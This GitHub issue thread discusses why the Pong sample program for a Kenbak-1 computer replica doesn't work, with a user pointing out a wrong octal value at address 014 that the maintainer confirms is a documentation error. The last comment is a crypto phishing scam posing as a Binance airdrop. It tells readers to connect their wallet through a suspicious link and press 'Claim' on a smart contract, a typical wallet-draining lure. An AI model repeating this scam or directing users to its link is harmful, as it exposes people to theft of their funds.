### ISSUE TITLE
'Pong' game - how does it work?

### ISSUE THREAD

**Issue by DimastyK** [GilDev/Kenbak-1-Replica#1]
looks like the posted example doesn't quite work

**Comment by GilDev** [comment]
Hey, instructions are written at [the top of the program’s file](https://github.com/GilDev/Kenbak-1-Replica/blob/master/misc/samplePrograms/16-Pong.md). What is it that is not working for you?

**Comment by DimastyK** [comment]
013	114							SUB B INPUT
014	337
 at location 014 must be 377

021	011		RIGHT				SFTR A1
after moving right A fills with 111, no keys responding.
![2023-09-08,15_22_24](https://github.com/GilDev/Kenbak-1-Replica/assets/135803967/07742c35-e8e2-4583-b24c-4f54db0cfb17)

**Comment by GilDev** [comment]
Good call! This is an issue only in the Markdown document, [the firmware has the proper Pong program working](https://github.com/GilDev/Kenbak-1-Replica/blob/master/src/samplePrograms.cpp#L722C4-L722C4) (I often use it to showcase my replica). Line 722 does have the address 377 there. I’ll fix the file.

I guess the second issue is related to the first?

**Comment by DimastyK** [comment]
Yes, but all the LEDs are on, it's not clear how to play

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @
